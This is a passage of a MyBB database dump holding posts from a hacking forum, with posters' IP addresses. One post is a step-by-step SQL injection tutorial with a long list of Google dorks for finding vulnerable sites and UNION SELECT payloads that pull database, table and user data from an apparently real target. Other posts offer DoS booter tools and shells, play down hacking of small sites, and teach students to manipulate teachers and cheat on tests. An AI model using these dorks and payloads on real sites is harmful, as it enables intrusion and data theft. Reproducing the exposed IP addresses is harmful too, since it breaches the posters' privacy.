admin has a different secret pin.\r\n\r\nMy first HQ post on my own website :D', '72.229.164.105', '1223009385', '1', '0', '1', '1347485511', '1', '5721dd78834a46095acdadb7166bde04', '0', '1347485511'); INSERT INTO mybb_posts VALUES('23', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '2', 'Apathy', '1340038805', 'We should not be getting mods in till we are big...', '173.206.128.200', '-1378975544', '0', '0', '0', '0', '1', '19dd4f2c23b4245e4bb53185bf5c77b5', '0', '0'); INSERT INTO mybb_posts VALUES('26', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '3', '??????????¢™', '1340054979', 'This will come in handy when we get bigger.', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'ffd029b84cfc81515e0208370ddd0e30', '0', '0'); INSERT INTO mybb_posts VALUES('27', '5', '12', '16', 'RE: How to spot a liar', '0', '3', '??????????¢™', '1340055114', 'Well this can come in handy when you are trying to spot a liar.', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'bed6a09aac25c32ac72706010bf5313d', '0', '0'); INSERT INTO mybb_posts VALUES('28', '11', '0', '15', '.EXE Booter Pack', '0', '3', '??????????¢™', '1340055626', '[i][align=center][size=x-large]Wassup LH members, Today I will be giving away a .EXE pack. The pack includes about 6 including doodies dos tool and Jays Shell + a Shell Checker.[/size][/align][/i]\r\n\r\n[b][i][align=center][size=x-large][color=#FFD700]To get this all you have to do is post below and PM me, This is to prevent unregistered members from getting them.[/align][/color][/size][/i][/b]', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'f634646b04a6b2575c752947c6a3be91', '0', '0'); INSERT INTO mybb_posts VALUES('29', '10', '21', '5', 'RE: [tut]How to moderate L33THacking', '0', '1', 't3h jok3r', '1340062568', 'Thanks and AS I posted this for people who are new to mybb and don\'t know how to moderate.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '1beaed018caf266d5e1ce2dd3e72905c', '0', '0'); INSERT INTO mybb_posts VALUES('30', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '1', 't3h jok3r', '1340062645', 'Awesome. Nice giveaway, don\'t need it at the moment.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '43d25e6c50fd09754945199c2f88a268', '0', '0'); INSERT INTO mybb_posts VALUES('31', '5', '12', '16', 'RE: How to spot a liar', '0', '1', 't3h jok3r', '1340063509', 'Luckily I didn\'t tell my girl to register otherwise she would\'ve dumped me after reading this :(\r\n\r\nBTW I was looking for this tutorial for the past 10 [s]seconds[/s] months, seriously.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '3127b189de3105d61191ffea8f8bc6e7', '0', '0'); INSERT INTO mybb_posts VALUES('32', '12', '0', '35', 'L33THacking userbar competition between t3h jok3r and apathy', '0', '1', 't3h jok3r', '1340066415', 'I have made two userbars for the elite group.\r\n\r\n1. [img]http://img825.imageshack.us/img825/834/elite1.gif[/img]\r\n\r\n2. [img]http://img849.imageshack.us/img849/2427/blanktemplatec.png[/img]\r\n\r\n\r\nAPATHY\r\n \r\nBy far not my best but oh well.\r\n\r\nFirst two attempts\r\n1.[IMG]http://i.imgur.com/02fq3.gif[/IMG]\r\n\r\n2.[IMG]http://i.imgur.com/VFRXJ.png[/IMG]', '72.229.164.105', '1223009385', '1', '0', '1', '1340076711', '1', 'e6a3332510c94411c2368de584be306d', '0', '1340076711'); INSERT INTO mybb_posts VALUES('33', '12', '32', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '3', '??????????¢™', '1340071690', 'Joker:\n1. I like\n2. I like\n\nApathy:\n1. I like\n2. I dont like\n\nTherefor the winner is JOKER!', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', '435d37e09a3bc9191482e23c06f77c16', '0', '0'); INSERT INTO mybb_posts VALUES('34', '12', '32', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '1', 't3h jok3r', '1340071909', 'OK but now between all three which one should we use?', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '88b30fd354d30fdca8f91bff40e9ec7f', '0', '0'); INSERT INTO mybb_posts VALUES('35', '12', '32', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '3', '??????????¢™', '1340074187', '1. Good because it is blue\n2. Good because it is animate but if its not going to be animated on the forum then use the first one.', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'd00999e7f09a9b3e3c8b7244c3841e0b', '0', '0'); INSERT INTO mybb_posts VALUES('36', '12', '32', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '1', 't3h jok3r', '1340076744', 'Uh OK, anyways added to the upgrade page.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '4d19b59359247819695e2318ff8996b9', '0', '0'); INSERT INTO mybb_posts VALUES('37', '6', '14', '4', 'RE: Welcome to L33THacking.com', '0', '4', 'Triple H', '1340077618', 'Thanks for the welcome and the list. I\'m so happy to be the first regular member of L33thacking', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'a48bbcb8974af511ad416fff80776333', '0', '0'); INSERT INTO mybb_posts VALUES('38', '13', '0', '4', 'newbie', '0', '4', 'Triple H', '1340077670', 'Sup ppl?\r\n\r\nIm new out here and looking forward to learn some stuff.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '9c61e12308382466a121527d76d0bd4a', '0', '0'); INSERT INTO mybb_posts VALUES('39', '14', '0', '8', 'Work Hard Play Hard-Rap', '0', '4', 'Triple H', '1340077789', 'This is my current favorite song.\r\n\r\n[video=youtube]http://www.youtube.com/watch?v=TWHNr0BrNgo[/video]\r\n\r\nThe most repeated word reminds of someone right slim shady?', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '2991208128e88f349ca58c678ffe79a0', '0', '0'); INSERT INTO mybb_posts VALUES('40', '5', '12', '16', 'RE: How to spot a liar', '0', '4', 'Triple H', '1340077866', 'Awesome and well-written tutorial. Nice and thanks for posting, gonna learn these today.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', '8291a1d29e8b5ae8408ca7cfc21aa218', '0', '0'); INSERT INTO mybb_posts VALUES('41', '15', '0', '9', 'Adf.ly>Earn $$$ by clicks on links', '0', '4', 'Triple H', '1340078109', '[size=large][u][b]What is Adf.ly?[/b][/u][/size]\r\n\r\nWe are a free URL shortener service with a twist..get paid to share your links on the Internet! Just register for an account and start shrinking. You get paid for every person that visits your URLs. Example URL for hotspot shield: http://adf.ly/3oGgX Place your links on Twitter, forums, personal websites and any social networking sites.\r\n\r\n[size=large][u][b]Why choose Adf.ly?[/b][/u][/size]\r\n\r\nEarn more than $4.00 / 1000 visitors to your links. Get tiny URLs, great for when text space is limited. All advertising is strictly family-safe with no popups. Frequent statistics with revenue breakdown. Refer users and get a massive 20% commission. Many tools - Mass Shrinker, Easy Link, API. Easy-to-reach $5.00 minimum payout.\r\n\r\nPlease use the referral below.\r\n\r\nhttp://adf.ly/?id=1108462\r\n\r\nHave any questions? Post em below.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'aa1c031c36505f0e6cab79c6e3d25723', '0', '0'); INSERT INTO mybb_posts VALUES('42', '16', '0', '11', 'Is Hacking legal or illegal?', '0', '4', 'Triple H', '1340078190', 'Title explains it all. Hoping some gud answers.', '72.229.164.105', '1223009385', '0', '0', '0', '0', '1', 'd292abcb0f0a550e59a777ab95277f43', '0', '0'); INSERT INTO mybb_posts VALUES('43', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '2', 'Apathy', '1340078377', 'Hacking is illegal, but hacking minor stuff such as small websites and kids emails etc would not draw much attention. L33THacking.com is for educational purposes only.', '173.206.138.77', '-1378973107', '0', '0', '0', '0', '1', '4be876e764a678ea5942508b42420579', '0', '0'); INSERT INTO mybb_posts VALUES('44', '4', '13', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '3', '??????????¢™', '1340078942', '[quote=\'t3h jok3r\' pid=\'13\' dateline=\'1339992181\']\r\n[quote=\'??????\' pid=\'11\' dateline=\'1339991371\']\r\nThis is a great tutorial you got there OP, Hopefully it will help some people out.\r\n[/quote]\r\nWhy because it was originally your tutorial?\r\n\r\nI felt like crying. Anyways nice tutorial, thanks for creating it :cool:\r\n[/quote]', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', '517755e2e241ad31ac0a41fd3781784c', '0', '0'); INSERT INTO mybb_posts VALUES('45', '14', '39', '8', 'RE: Work Hard Play Hard-Rap', '0', '3', '??????????¢™', '1340079039', 'Yea I also love that song bro. Work Work Work Work', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', '1462d2c11d5043935b400d2e0f0467af', '0', '0'); INSERT INTO mybb_posts VALUES('46', '17', '0', '8', 'My Dubstep Remixs', '0', '3', '??????????¢™', '1340081822', '[b][i][size=xx-large][align=center]Hey guys, If you would like to listen to my dubstep remixes just go to the link below and please post here what you think about them.[/align][/i][/b][/size]\r\n\r\n[size=xx-large][align=center][url=soundcloud.com/RebornHF]My Soundcloud[/url][/align][/size]', '75.22.48.94', '1259745374', '1', '0', '3', '1340082013', '1', '7e2de5ea771b84a4dbc217d2b69d7b28', '0', '1340082013'); INSERT INTO mybb_posts VALUES('47', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '2', 'Apathy', '1340123081', 'If you really made those I liked them keep it up.', '173.206.138.77', '-1378973107', '0', '0', '0', '0', '1', 'ef38f485f97beac4f94eb71d87505371', '0', '0'); INSERT INTO mybb_posts VALUES('48', '12', '36', '35', 'RE: L33THacking userbar competition between t3h jok3r and apathy', '0', '3', '??????????¢™', '1340142283', '[quote=\'t3h jok3r\' pid=\'36\' dateline=\'1340076744\']\r\nUh OK, anyways added to the upgrade page.\r\n[/quote]\r\nOkay I see it', '75.35.239.52', '1260646196', '1', '0', '0', '0', '1', 'f7b07142521b79b416661f6d73dba93f', '0', '0'); INSERT INTO mybb_posts VALUES('49', '18', '0', '2', 'star test', '0', '1', 't3h jok3r', '1340143700', '[img]http://png-5.findicons.com/files//icons/2232/wireframe_mono/16/star_fav.png[/img]\r\n\r\nJust checking how this star would look.', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '64909191fc48ea7bbd0731f33b55b008', '0', '0'); INSERT INTO mybb_posts VALUES('50', '11', '30', '15', 'RE: .EXE Booter Pack', '0', '3', '??????????¢™', '1340219666', '[quote=\'t3h jok3r\' pid=\'30\' dateline=\'1340062645\']\r\nAwesome. Nice giveaway, don\'t need it at the moment.\r\n[/quote]\r\n\r\nThanks, This will come in handy for some people.', '75.35.239.52', '1260646196', '1', '0', '0', '0', '1', 'e0adea191d7dfe85e80bc2aa5f676d90', '0', '0'); INSERT INTO mybb_posts VALUES('51', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '1', 't3h jok3r', '1340312248', 'True, by the way guests can not view threads anymore but I think keep this as a post here and pm me giveaway.', '41.151.131.242', '697795570', '1', '0', '0', '0', '1', '2fe594532fb20bf48303abca5a2e4113', '0', '0'); INSERT INTO mybb_posts VALUES('52', '13', '38', '4', 'RE: newbie', '0', '1', 't3h jok3r', '1340317240', 'Welcome to L33THacking.com.\n\nHope you enjoy the forums.', '41.151.135.161', '697796513', '1', '0', '0', '0', '1', '29f5c1daad50840ffc752b58094afc59', '0', '0'); INSERT INTO mybb_posts VALUES('53', '4', '44', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '4', 'Triple H', '1340514008', '[quote=\'??????\' pid=\'44\' dateline=\'1340078942\']\r\n[quote=\'t3h jok3r\' pid=\'13\' dateline=\'1339992181\']\r\n[quote=\'??????\' pid=\'11\' dateline=\'1339991371\']\r\nThis is a great tutorial you got there OP, Hopefully it will help some people out.\r\n[/quote]\r\nWhy because it was originally your tutorial?\r\n\r\nI felt like crying. Anyways nice tutorial, thanks for creating it :cool:\r\n[/quote]\r\n[/quote]\r\n\r\n\r\nLol I would say nice tutorial to the OP and t3h jok3r.', '41.174.14.8', '699272712', '0', '0', '0', '0', '1', 'a721e9c1bb66549f258943801d519d32', '0', '0'); INSERT INTO mybb_posts VALUES('54', '19', '0', '16', '[tut]How to SE your school teachers', '0', '4', 'Triple H', '1340515684', 'This is a quick tutorial on how to SE your teachers. This SE will not guarantee you better grades and shit. \n\n[b][u]Step 1[/u][/b]\n\nGreet your teachers. Now don\'t be a decent nerd and say good morning and shit. Say something like what\'s up, how are you, howz it going, you look happy today or say wats up and do a hand shake.\n\nWhat this does is that teachers get to know you, they feel like they are your friend etc. \n\n[u][b]Step 2[/b][/u]\n\nOn Mondays try asking your teachers how was their weekend but not everyweek. Also on Fridays say bye and enjoy your weekend by this you are being kind and polite. From this you would have their respect.\n\nNow what I do is that from this my teachers give me heads up and when we have an exam/test then I go to their table pretending that I\'m talking to him but look at the questions/answers.\n\n[b][u]Step 3[/u][/b]\n\nIf you get caught talking then the first time say it wasn\'t your fault. Then what they do is they will keep their eye on you and you would obviously talk again so the second time you get caught say Ok, I\'m listening now. Also try to copy all the work on your chalk board/smart board.\n\n[b][u]Step 4[/u][/b]\n\nIf possible try to act like you are doing your work, also get to class before the bell or maximum 3 mins late. Don\'t leave the class before the bell.\n\n[b][u]Step 5[/b][/u]\n\nNormally some teachers give out worksheets and homework to quickly so I normally finish all my homework at school by ignoring their dumbass lecture. Try to get all your homework done even late is ok cuz then they think you are trying hard.\n\n[u][b]Step 6[/b][/u]\n\nIf you get bad grades in tests, projects or homeworks don\'t worry about it. Late they will feel bad/pity for you and try to help in tests etc. What my teachers do is they go around me and sometimes tell me if my answer is wrong. This gives me another chance to get a better grade.\n\n[u][b]Step 7[/b][/u]\n\nIf you are going to lie to them then make sure you have a valid proof plus if you get caught walking around by a teacher say you are looking for a teacher or bathroom. Because they will think that you a good student so if you are looking for a teacher then that\'s probably true or the bathroom excuse never expires. \n\n[b]Optional:[u] Step 8[/u][/b]\n\nIf you are a good student and you are failing then you can ask them for more work to boost up your grades and since they care about you and know you they won\'t dump work on you. They will give you less work and in most of the stuff say you don\'t know/understand so they will answer it for you which will save you time and you won\'t need to answer them. When they are talking to you look in their eyes or say mhm, ok or yeah. \n\nGood Luck!\n\n[color=transparent]Some keywords to help bring traffic to LH\nSocial Engineering, SE, Teachers ,L33t ,Hacking ,Hack forums ,SQLI ,Human Manipulation ,Cheat [/color]', '41.174.14.8', '699272712', '0', '0', '4', '1340515833', '1', '110e840fa614141ccfec82729b3ab224', '0', '1340515833'); INSERT INTO mybb_posts VALUES('55', '17', '46', '8', 'RE: My Dubstep Remixs', '0', '4', 'Triple H', '1340516596', 'Can you please stop using bold and x-large text? BTW what are dubstep remixes?', '41.174.14.8', '699272712', '0', '0', '0', '0', '1', 'c8af584454c71fa3b5ad5c1ab2b1b68f', '0', '0'); INSERT INTO mybb_posts VALUES('56', '11', '28', '15', 'RE: .EXE Booter Pack', '0', '4', 'Triple H', '1340516694', 'Can I have this? BTW I can\'t PM till I have 10 posts.', '41.174.14.8', '699272712', '0', '0', '0', '0', '1', 'ff87c233c8d55d5e00f6b1898f4d6c1b', '0', '0'); INSERT INTO mybb_posts VALUES('57', '20', '0', '13', 'SQL Injection Tutorial (Step-by-Step)', '0', '5', 'Timmy', '1340517446', '[color=#FF0000]SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. It is an instance of a more general class of vulnerabilities that can occur whenever one programming or scripting language is embedded inside another. SQL injection attacks are also known as SQL insertion attacks.[/color]\r\n\r\nStep-by-Step tutorial for SQL Injection\r\n\r\n[b]Step 1:[/b][color=#1E90FF] Find a website that is vulnerable to the attack. This is the first step in SQLi and like every other hack attack is the most time consuming, and is the only time consuming step. Once you get through this, rest is a cake-walk. Now, let us all know what kind of pages are vulnerable to this attack. We are providing you with a few dorks(google strings to find vulnerable sites). Though at the end of this post, we\'ll provide a list of vulnerable sites.[/color]\r\n\r\n[spoiler]Dorks:\r\n\"inurl:index.php?catid=\"\r\n\"inurl:news.php?catid=\"\r\n\"inurl:index.php?id=\"\r\n\"inurl:news.php?id=\"\r\ninurl:index.php?id=\r\ninurl:trainers.php?id=\r\ninurl:buy.php?category=\r\ninurl:article.php?ID=\r\ninurl:play_old.php?id=\r\ninurl:declaration_more.php?decl_id=\r\ninurl:pageid=\r\ninurl:games.php?id=\r\ninurl:page.php?file=\r\ninurl:newsDetail.php?id=\r\ninurl:gallery.php?id=\r\ninurl:article.php?id=\r\ninurl:show.php?id=\r\ninurl:staff_id=\r\ninurl:newsitem.php?num=\r\ninurl:readnews.php?id=\r\ninurl:top10.php?cat=\r\ninurl:historialeer.php?num=\r\ninurl:reagir.php?num=\r\ninurl:Stray-Questions-View.php?num=\r\ninurl:forum_bds.php?num=\r\ninurl:game.php?id=\r\ninurl:view_product.php?id=\r\ninurl:newsone.php?id=\r\ninurl:sw_comment.php?id=\r\ninurl:news.php?id=\r\ninurl:avd_start.php?avd=\r\ninurl:event.php?id=\r\ninurl:product-item.php?id=\r\ninurl:sql.php?id=\r\ninurl:news_view.php?id=\r\ninurl:select_biblio.php?id=\r\ninurl:humor.php?id=\r\ninurl:aboutbook.php?id=\r\ninurl:ogl_inet.php?ogl_id=\r\ninurl:fiche_spectacle.php?id=\r\ninurl:communique_detail.php?id=\r\ninurl:sem.php3?id=\r\ninurl:kategorie.php4?id=\r\ninurl:news.php?id=\r\ninurl:index.php?id=\r\ninurl:faq2.php?id=\r\ninurl:show_an.php?id=\r\ninurl:preview.php?id=\r\ninurl:loadpsb.php?id=\r\ninurl:opinions.php?id=\r\ninurl:spr.php?id=\r\ninurl:pages.php?id=\r\ninurl:announce.php?id=\r\ninurl:clanek.php4?id=\r\ninurl:participant.php?id=\r\ninurl:download.php?id=\r\ninurl:main.php?id=\r\ninurl:review.php?id=\r\ninurl:chappies.php?id=\r\ninurl:read.php?id=\r\ninurl:prod_detail.php?id=\r\ninurl:viewphoto.php?id=\r\ninurl:article.php?id=\r\ninurl:person.php?id=\r\ninurl:productinfo.php?id=\r\ninurl:showimg.php?id=\r\ninurl:view.php?id=\r\ninurl:website.php?id=\r\ninurl:hosting_info.php?id=\r\ninurl:gallery.php?id=\r\ninurl:rub.php?idr=\r\ninurl:view_faq.php?id=\r\ninurl:artikelinfo.php?id=\r\ninurl:detail.php?ID=\r\ninurl:index.php?=\r\ninurl:profile_view.php?id=\r\ninurl:category.php?id=\r\ninurl:publications.php?id=\r\ninurl:fellows.php?id=\r\ninurl:downloads_info.php?id=\r\ninurl:prod_info.php?id=\r\ninurl:shop.php?do=part&id=\r\ninurl:productinfo.php?id=\r\ninurl:collectionitem.php?id=\r\ninurl:band_info.php?id=\r\ninurl:product.php?id=\r\ninurl:releases.php?id=\r\ninurl:ray.php?id=\r\ninurl:produit.php?id=\r\ninurl:pop.php?id=\r\ninurl:shopping.php?id=\r\ninurl:productdetail.php?id=\r\ninurl:post.php?id=\r\ninurl:viewshowdetail.php?id=\r\ninurl:clubpage.php?id=\r\ninurl:memberInfo.php?id=\r\ninurl:section.php?id=\r\ninurl:theme.php?id=\r\ninurl:page.php?id=\r\ninurl:shredder-categories.php?id=\r\ninurl:tradeCategory.php?id=\r\ninurl:product_ranges_view.php?ID=\r\ninurl:shop_category.php?id=\r\ninurl:transcript.php?id=\r\ninurl:channel_id=\r\ninurl:item_id=\r\ninurl:newsid=\r\ninurl:trainers.php?id=\r\ninurl:news-full.php?id=\r\ninurl:news_display.php?getid=\r\ninurl:index2.php?option=\r\ninurl:readnews.php?id=\r\ninurl:top10.php?cat=\r\ninurl:newsone.php?id=\r\ninurl:event.php?id=\r\ninurl:product-item.php?id=\r\ninurl:sql.php?id=\r\ninurl:aboutbook.php?id=\r\ninurl:preview.php?id=\r\ninurl:loadpsb.php?id=\r\ninurl:pages.php?id=\r\ninurl:material.php?id=\r\ninurl:clanek.php4?id=\r\ninurl:announce.php?id=\r\ninurl:chappies.php?id=\r\ninurl:read.php?id=\r\ninurl:viewapp.php?id=\r\ninurl:viewphoto.php?id=\r\ninurl:rub.php?idr=\r\ninurl:galeri_info.php?l=\r\ninurl:review.php?id=\r\ninurl:iniziativa.php?in=\r\ninurl:curriculum.php?id=\r\ninurl:labels.php?id=\r\ninurl:story.php?id=\r\ninurl:look.php?ID=\r\ninurl:newsone.php?id=\r\ninurl:aboutbook.php?id=\r\ninurl:material.php?id=\r\ninurl:opinions.php?id=\r\ninurl:announce.php?id=\r\ninurl:rub.php?idr=\r\ninurl:galeri_info.php?l=\r\ninurl:tekst.php?idt=\r\ninurl:newscat.php?id=\r\ninurl:newsticker_info.php?idn=\r\ninurl:rubrika.php?idr=\r\ninurl:rubp.php?idr=\r\ninurl:offer.php?idf=\r\ninurl:art.php?idm=\r\ninurl:title.php?id= \r\nand you can also write your own.\r\n[/spoiler]\r\n\r\n\r\nHow to check if a webpage is vulnerable to this attack???\r\nOnce you execute the dorks and get the preferred search results. Say for example\r\nhxxp://www.example.com/index.php?catid=1\r\n\r\nAdd a \' (apos) at the end of the URL. Such that the URL looks like\r\nhxxp://www.example.com/index.php?catid=1\'\r\n\r\nIf the page returns an SQL error, the page is vulnerable to SQLi. If it loads normally, leave the page and move on to the next site in the search result.\r\n\r\nTypical errors you\'ll get after appending the apostrophe are:\r\n[color=#FFD700]Warning: mysql_fetch_array():\r\nWarning: mysql_fetch_assoc():\r\nWarning: mysql_numrows():\r\nWarning: mysql_num_rows():\r\nWarning: mysql_result():\r\nWarning: mysql_preg_match():[/color]\r\n\r\n[b]Step 2:[/b][color=#32CD32]Once you find a vulnerable site, you need to enumerate the number of columns and those columns that are accepting the queries from you.\r\n\r\nAppend an \'order by\' statement to the URL.\r\neg. hxxp://www.example.com/index.php?catid=1 order by 1\r\n\r\nContinue increasing the number after order by till you get an error. So the highest number for which you do not get an error is the number of columns in the table. Now to know the column numbers which are accepting the queries.\r\n\r\nAppend an \'Union Select\' statement to the URL. Also precede the number after \"id=\" with a hyphen or minus.\r\nSay from the above step, you got that the table has 6 columns. \r\neg. hxxp://www.example.com/index.php?catid=-1 union select 1,2,3,4,5,6\r\n\r\nResult of this query will be the column numbers that are accepting the queries. Say we get 2,3,4 as the result. Now we\'ll inject our SQL statements in one of these columns. [/color]\r\n\r\n[b]Step 3:[/b] [color=#DCDCDC]Enumerating the SQL version\r\nWe\'ll use the mysql command @@version or version() to get the version of the db. We have to inject the command in one of the open columns. Say we use column number 2.\r\n\r\neg. hxxp://www.example.com/index.php?catid=-1 union select 1,@@version,3,4,5,6\r\n\r\nYou\'ll get the version of the database in the place where you had got the number 2. If the starting of the version number is 5 or more, then you are good to go. If less move on to another site.[/color]\r\n\r\n[b]Step 4:[/b] [color=#9400D3] Exploit\r\nTo get list of databases:\r\nhxxp://www.example.com/index.php?catid=-1 union select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata--\r\n\r\nResult will display a list of databases on the site. Here on, we\'ll write the results we have got from our test.\r\nResult: information_schema,vrk_mlm\r\n\r\nTo know the current database in use:\r\nhxxp://www.example.com/index.php?catid=-1 union select 1,concat(database()),3,4,5,6--\r\nResult: vrk_mlm\r\n\r\nTo get the current user:\r\nhxxp://www.example.com/index.php?catid=-1 union select 1,concat(user()),3,4,5,6--\r\nResult: vrk_4mlm@localhost\r\n\r\nTo get the tables:\r\nhxxp://www.example.com/index.php?catid=-1 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()--\r\nResult: administrator,category,product,users\r\n\r\nWe\'ll concentrate our attack on the users table.\r\n\r\nTo get the columns:\r\nhxxp://www.example.com/index.php?catid=-1 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()--\r\nResult: admin_id,user_name,password,user_type,status,catID,catName,prodId,catID,prodName,prodDesc,\r\nprodKeyword,prodPrice,prodImage,id,incredible_id,f_name,m_name,l_name,refered_by_id,\r\nrefered_direct_to_ids,refered_to_ids,no_of_direct_referals,credits,position,\r\nemail_id,password,edited_on,last_login,created_on,chain_number,phone,address\r\n\r\nBy lookin at the columns closely, and the order of the tables, we can conclude that starting from id,incredible_id are the columns belonging to the users table and we are interested in that.[/color]\r\n\r\nExtract information:\r\n[color=#FF1493]union select group_concat(id,0x3a,incredible_id,0x3a,f_name,0x3a,m_name,0x3a,l_name,0x3a,refered_by_id,0\r\nx3a,refered_direct_to_ids,0x3a) from vrk_mlm.users-[/color]\r\n\r\nEnjoy!\r\n\r\nThanks for reading.', '41.174.14.8', '699272712', '1', '0', '0', '0', '1', '7328c4d8d0df75209c5e31147f7e0b08', '0', '0'); INSERT INTO mybb_posts VALUES('58', '20', '57', '13', 'RE: SQL Injection Tutorial (Step-by-Step)', '0', '2', 'Apathy', '1340567959', 'Thanks for contributing to the site. Nice tutorial', '173.206.138.77', '-1378973107', '0', '0', '0', '0', '1', 'e26fa4d26be1de51940371cf973a85c6', '0', '0'); INSERT INTO mybb_posts VALUES('59', '21', '0', '16', '[GUIDE] In-depth reading of body language.', '0', '2', 'Apathy', '1340568256', '[u][color=#4682B4][size=medium][b]Intro[/b][/size][/color][/u]\r\n[i]As most of you may know, body language is a type of non-verbal communication. This form of communication consists of body posture, facial expressions, eye movements and gestures.\r\nHumans send, receive and interpret these signals entirely subconsciously.\r\n\r\nSo if you think about it.., if we would observe every person in our direct environment, we\'d be able to get direct access to their state of mind.\r\nFurther more, if we would exploit this information, we could easily put people at ease during a conversation.[/i]\r\n\r\n[color=#4682B4][size=medium][u][b]Emotions[/b][/u][/size][/color]\r\n[i]In our daily lives, we experience many different kinds of emotions. By looking around you once in a while, you will realize and perhaps, experience that there are many more kinds of emotions that you probably don\'t even know, yet. Therefore, it is important as a social engineer to sit on the side lines and observe.\r\n\r\nBelow this sentence, you\'ll find a list of all [color=#32CD32][b]positive[/b][/color] human emotions. I want you to post a comment if there\'s an emotion that you haven\'t heard of, yet.[/i]\r\n[list]\r\n[*][b]Comfortable[/b]\r\n[*][b]Dedicated[/b]\r\n[*][b]Enthousiastic[/b]\r\n[*][b]Glorious[/b]\r\n[*][b]Hopeful[/b]\r\n[*][b]Joyful[/b]\r\n[*][b]Pleasure[/b]\r\n[*][b]Cheerful[/b]\r\n[*][b]Relaxed[/b]\r\n[*][b]Pride[/b]\r\n[*][b]Excited[/b]\r\n[*][b]Delighted[/b]\r\n[*][b]Lively[/b]\r\n[*][b]Surprised[/b]\r\n[*][b]Satisfied[/b]\r\n[*][b]Energetic[/b]\r\n[*][b]Charmed[/b]\r\n[/list]\r\n\r\n[i]Below this sentence, you\'ll find a list of all [color=#FF0000][b]negative[/b][/color] human emotions. I want you to post a comment if there\'s an emotion that you haven\'t heard of, yet.[/i]\r\n[list]\r\n[*][b]Annoyed[/b]\r\n[*][b]Anxious[/b]\r\n[*][b]Angered[/b]\r\n[*][b]Bored[/b]\r\n[*][b]Cautious[/b]\r\n[*][b]Competitive[/b]\r\n[*][b]Concerned[/b]\r\n[*][b]Confused[/b]\r\n[*][b]Depressed[/b]\r\n[*][b]Disgusted[/b]\r\n[*][b]Distracted[/b]\r\n[*][b]Doubtful[/b]\r\n[*][b]Disappointed[/b]\r\n[*][b]Exhausted[/b]\r\n[*][b]Embarassed[/b]\r\n[*][b]Frustrated[/b]\r\n[*][b]Fear[/b]\r\n[*][b]Guilty[/b]\r\n[*][b]Impatient[/b]\r\n[*][b]Indifferent[/b]\r\n[*][b]Jumpy[/b]\r\n[*][b]Lonely[/b]\r\n[*][b]Mad[/b]\r\n[*][b]Panic[/b]\r\n[*][b]Revenge[/b]\r\n[*][b]Shame[/b]\r\n[*][b]Sad[/b]\r\n[*][b]Scared[/b]\r\n[*][b]Shocked[/b]\r\n[*][b]Suspicious[/b]\r\n[*][b]Stressed[/b]\r\n[*][b]Tired[/b]\r\n[*][b]Uncomfortable[/b]\r\n[/list]\r\n\r\n[i]Also notice that sometimes, negative emotions might not nearly be as intense as you think. It all depends on how WE label the emotion in our heads. Some people might rather be irritated than angry, or either frustrated than disappointed.\r\n\r\nSo, as you can see, there are many different types of emotions in our daily lives. It may be a good thing if you\'d look around you once in a while, then come back to this list and see how much you\'ve experienced.[/i]\r\n\r\n[color=#4682B4][size=medium][u][b]Physical expressions[/b][/u][/size][/color]\r\n[i]Many physical expressions, such as waving, pointing or touching are all forms of nonverbal communication. People always move their bodies while communicating because it helps, as research has shown; [/i]\r\n[quote]\"ease the mental effort when communication is difficult.\"[/quote]\r\n[i]As I said earlier, physical expressions explain a lot about the person who is using them. For example, gestures could easily emphasize a point or relay a message, while a posture could show signs of boredom or great interest.\r\n\r\nHere are some of the most frequent gestures and postures in our daily lives;[/i]\r\n[list]\r\n[*][b]Arms crossed over the chest.[/b][list]\r\n[*][i]This is without a doubt one of the most basic, yet powerful body language signals in human history. When someone does this, it could indicate that this person is putting up a subconscious barrier between themselves and what we would call \'reality\'. This usually means that they want to be left alone for a while. If this gesture is used in an amical situation, it might mean that the person is thinking deeply about what is being discussed. Yet, if the situation is rather serious, sudden or confrontational, this might mean that this person is expressing an opposition. This is especially so when said person is leaning away from us, the speakers.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Constant eye contact.[/b][list]\r\n[*][i]In most cases, constant eye contact means that a person is thinking positively about us, the speaker. However, it could also mean that the other person doesn\'t trust us enough to \"take their eyes off us.\". Lack of eye contact might indicate negativity as well.\r\nDon\'t let this information fool you, though. People with an anxiety disorder may not be able to look at another without getting a feeling of discomfort. Therefore, eye contact is pretty much a secondary and misleading gesture. When combined with the \"crossed-arms\" signal, the eye contact gesture usually means that something is playing in that person\'s mind and that he wants to talk about it.[/i]\r\n[/list]\r\n[/list]\r\n[list]\r\n[*][b]Scratching behind the ear.[/b][list]\r\n[*][i]Most of the time, this will go together by scratching their 